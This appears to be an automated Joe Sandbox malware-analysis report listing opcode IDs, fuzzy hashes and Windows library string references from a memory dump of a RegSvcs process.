                                            • Instruction Fuzzy Hash: 4BE17C71A00219AFEB268E9DD980BAEBBBAFF44714F14442AE901F7291D734DB41CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 9876168fb5a62e5ecbb02f385946be8bb19e4b47a325f3d6b7db5c0983fc5d94
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 71C1E2322043529BE725CF28C840B2BBBE9BFD4719F084A2DF69ACB694D774D505CB42
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                            • Instruction ID: 3c37c044adf7dc54fec39d6a97fb08f1a3ed937eeca892b39908fb99f5ecf0b7
                                            • Opcode Fuzzy Hash: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                            • Instruction Fuzzy Hash: 8B616E71E007199FDB24DFA8C881BAEBBB9FB44704F54406DE649EB291DB31EA40CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                            • Instruction ID: c88db7dbedebf7e124f4ee8fcff94165b5c40ce5b15edd6f0519fea8dc073fdf
                                            • Opcode Fuzzy Hash: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                            • Instruction Fuzzy Hash: D751F971E0021DAFEB11DFA9CC80AEEBBBDAB44754F100529E615F7290D631AA05CB61
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0186063D
                                            • kLsE, xrefs: 01860540
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                            • Instruction ID: a2eb22fc2258c512421b054d2119ddab49818795ec7a2c2f79e0cdf39616eb61
                                            • Opcode Fuzzy Hash: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                            • Instruction Fuzzy Hash: BF51D0715047468FD725EF68C4446A7BBE8AF84304F10483EFADAC7241E774DA45CB9A
                                            Strings
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0186A2FB
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0186A309
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                            • Instruction ID: ff4a1da4315093e61c8d7264f8355fbf41c63bd1e09a22e5732bb1d0f3e221d8
                                            • Opcode Fuzzy Hash: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                            • Instruction Fuzzy Hash: 5341BE30A04649DBDB19CF5DC940B6ABBB9FF85704F1440A9EA00EB291E7B5DB40CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                            • Instruction ID: 12fe8ee1d8e04a7128294c5c9d8fe80c962feb335101a51029c1228cdc79000b
                                            • Opcode Fuzzy Hash: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                            • Instruction Fuzzy Hash: ED0128B2244704AFD322DF14CD85F167BE8E784B16F098939B648C7590E374DA04CB86
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                            • Instruction ID: 3d953884617f53df3f24e98fe1b7ba4b33a2af5a23a560b9407827139cc8ecb4
                                            • Opcode Fuzzy Hash: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                            • Instruction Fuzzy Hash: 79826B75E002588FEB25CFA9C880BEDBBB9BF48314F148169D999EB351D730AE41CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                            • Instruction ID: 101a4d1b177f445791c259b3658b753fab20d2f4f412e68af36cf2c83d5cb898
                                            • Opcode Fuzzy Hash: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                            • Instruction Fuzzy Hash: C0915371A40219AFEB21EB99CD85FAE7BB9EF15B50F200065F600EB191E774EA00CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                            • Instruction ID: 68f96d2650ccd0f65e370b216dcc6a1a9e43d6054a4e0d1260a4dee32b6184a4
                                            • Opcode Fuzzy Hash: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                            • Instruction Fuzzy Hash: EE918172901609BFDB23EBA9DC44FAFBB79EF85740F140819F509A7290E7749A01CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                            • Instruction ID: e2e8621b078ff9ad5ef5a18494259a0d6efd294f167238c74aa941259960a9d7
                                            • Opcode Fuzzy Hash: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                            • Instruction Fuzzy Hash: 487149B5E0030E9BDF29DF9CD5916ADBBB1BF88714F24812AE905E7241E7309A41CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                            • Instruction ID: db715e7b658f81864ae2186d47ed8db7c37c6f420e0d4dac2c90785a56668dbb
                                            • Opcode Fuzzy Hash: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                            • Instruction Fuzzy Hash: 0C518472D0062A9FDF12DF99D840AAEBBB8AF08B10F054129EB15F7290D7749901CBE4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                            • Instruction ID: b178b83c1e134fe9c4b14a2e1d99ddca11d8d6baffae07a02da90ef336076b88
                                            • Opcode Fuzzy Hash: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                            • Instruction Fuzzy Hash: C24191725083429BD711DA79C980B6BB7E8EF88B58F44496DFA84D7140E774DB04C793
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                            • Instruction ID: 02b9e4d8a7543f4290ca23da9ca2478ee5b5e2ed54a7d4e92dda62c046c68c4e
                                            • Opcode Fuzzy Hash: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                            • Instruction Fuzzy Hash: 3C4131B1D0022DABDB219A64CC85FDEB77CAB45714F0045A9EB08EB141DB709F89CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                            • Instruction ID: df9353802f941a9941f3d04471487477ca819d87de587feec5e9c61107316711
                                            • Opcode Fuzzy Hash: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                            • Instruction Fuzzy Hash: 43312A31A007099BEB22DB6DC850BAE7BB8DF15704F64412CEA81EB282E775DE05CB50
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018E895E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                            • Instruction ID: 0989e477d0500081fd283431be345f0db26a769b4ab4512b6b7c6c75607b77dd
                                            • Opcode Fuzzy Hash: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                            • Instruction Fuzzy Hash: 6C01F732A043059BF731BA59988CA5E7FE5EF93394B05001CF641A7152CB60AE41C793
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                            • Instruction ID: 6524af82cff49c64bff7b52b0add9c6e61bc35977e7c1825d55b61a482fa2c33
                                            • Opcode Fuzzy Hash: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                            • Instruction Fuzzy Hash: 8642E6356083419FE726CF68C894A6BBBE9BF84700F18092DFA8AD7290D771D945CB53
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                            • Instruction ID: dfe124eaeca5c0bfad80d3b39c7e5a3c44fcdc152b38de1f22b3616c2c38acbd
                                            • Opcode Fuzzy Hash: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                            • Instruction Fuzzy Hash: C4425E75E102198FEB24CF69C881BADBBF5BF49300F14809DEA49EB252D7349A85CF51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                            • Instruction ID: cc22b61de2947f5a39438cc99812e4f083b55aefe4d02698e9b743b3e3025478
                                            • Opcode Fuzzy Hash: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                            • Instruction Fuzzy Hash: DD32DF70A047598BDB25CF69C844BBABBF2BF84B04F24412DD58ADB385E735EA41CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                            • Instruction ID: e6a4284ac44b5d12452bca429d052b99473d0ee5a408c5bb9ba28e0417f5a383
                                            • Opcode Fuzzy Hash: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                            • Instruction Fuzzy Hash: 0622BC746047618FEB26CF2DC490776BBF5BF44341F08895AD98A8B2C6D335E492DBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                            • Instruction ID: 42860d01c8433d8e555979df2be77f91cbbe661f5d6ff4bed0ca820c235958ee
                                            • Opcode Fuzzy Hash: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                            • Instruction Fuzzy Hash: 6C32AF71A00645CFDB25CF68C480BAABBF6FF48304F248569E955EB352E734EA41CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: 8e3d0827bedad42304d9d96a7e7fe29d5b0361dc4b381552b64d112d1119ac7c
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: 99F17E72E0061B9BDB15DFA9C580BAEBBF6AF48754F04812DE905EB341E734DA41CB60
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                            • Instruction ID: 2ccab9a122ce256405793d6fd827089a78cf3cc38e298ad82594a606e1e85e6d
                                            • Opcode Fuzzy Hash: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                            • Instruction Fuzzy Hash: F9D1D071A0060A9FDF15CF69C841BBEB7F1AF89304F18816DDA55E7241E735EA06CB60
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                            • Instruction ID: 9ab983120abb054cf1fa2ea388f0fc89443ae107373d1fcbac60b570d92996b0
                                            • Opcode Fuzzy Hash: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                            • Instruction Fuzzy Hash: 64E18071508382CFC715CF28C190A6ABBE5FF89318F158A6DE995C7351EB31EA05CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                            • Instruction ID: 471146effc5cde122c86df53803e923a7a5d256014f2bffe572bf12bec92fa60
                                            • Opcode Fuzzy Hash: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                            • Instruction Fuzzy Hash: A2D1E371A0020ADBDB54DF6AC8C0ABA77A5FF56308F04462EED16DB281E730EB55CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction ID: 0ab5b37084b9a6bd523545f5bf1f1fd1bcd20344c2fbd5edaccf6411e31482ff
                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction Fuzzy Hash: CDB17274A00609AFDF24DF99C948AAFBBF9FF86304F14445DAA02D7791DA74EA05CB10
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: 9d9e63b663a24cf059fa8bb1d174adf570495566168f04445a1af18c04817574
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: 55B1063160464AAFDB25CBA8C850BBEBBF6AF85704F140159E656EB281D730EF81CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                            • Instruction ID: 69e76627564a7a2e84b96441477d55a3a477c139a343d27a6dc4936b5af5433c
                                            • Opcode Fuzzy Hash: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                            • Instruction Fuzzy Hash: 69C14974508341CFE764CF19C498BAAB7E9BF88704F44495DE989C7291E774EA08CF92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                            • Instruction ID: dc7e93df3f843a46506b67165ec176eff632e542ef495afd50e0ce0527ba31c0
                                            • Opcode Fuzzy Hash: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                            • Instruction Fuzzy Hash: BDB16370A002658BDB65DF58C890BA9B7F5FF44744F0485E9E90AEB241EB709E86CF21
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                            • Instruction ID: 6fd747d8c338990a2e1991f5864d155b6878427359124543aad990ead92f8c91
                                            • Opcode Fuzzy Hash: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                            • Instruction Fuzzy Hash: 05A1E731E006599FFB21EB5CC844BADBBA5AF01B18F054115EB11E7291D774DF40CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                            • Instruction ID: 75e06ba19e576326b14e58cc07be62e00b93aaf7600e5cae08ed2c73adbc0a6c
                                            • Opcode Fuzzy Hash: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                            • Instruction Fuzzy Hash: 9EA1C470B0171A9FEB25DF69D890BAAB7B1FF54318F444029FA45D7281EB34EA11CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                            • Instruction ID: 519eaed8ee607b3f2b4b69a33dd16171707734770a2fd27130bb1bf51c72f3a0
                                            • Opcode Fuzzy Hash: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                            • Instruction Fuzzy Hash: 24A1AE72A04612DFD722DF28C980F5ABBE9FF88745F460A28E549DB651D334ED01CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction ID: a7b8d6796f885f665c9c6b3ac8c7d58c8da4372413d72701a02f2086a68f7c75
                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction Fuzzy Hash: 9AB13D71E0061ADFDF29CFADC880AADB7B5FF88311F148169E919AB354D730A941CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                            • Instruction ID: 3655b8f1db50a6a962edf5c21f28a1a66a17cdae5f441a2128c48458a2096417
                                            • Opcode Fuzzy Hash: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                            • Instruction Fuzzy Hash: 75917371D0021AAFDB15DF68D888BAEBFF5AF5A710F254159E610EB241E734DB009BA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                            • Instruction ID: 815ac2a7d3a80f0bb8c5e8eb6ac7c54f72f55b3588a46bfd4514eb22ffc8deb2
                                            • Opcode Fuzzy Hash: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                            • Instruction Fuzzy Hash: 7291F571E0061ACBEB24DB6DC484BBABBA1FF94B18F0541E9ED05EB241E634DB41C752
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                            • Instruction ID: f910a5f3b054e68d7030591bba6711046c946d5b713280c1f9cf760c6b821e88
                                            • Opcode Fuzzy Hash: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                            • Instruction Fuzzy Hash: A9817271A0061A9BDB24CF69C990AFEBBF9FB48700F14852EE555E7740E334EA40CB94
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
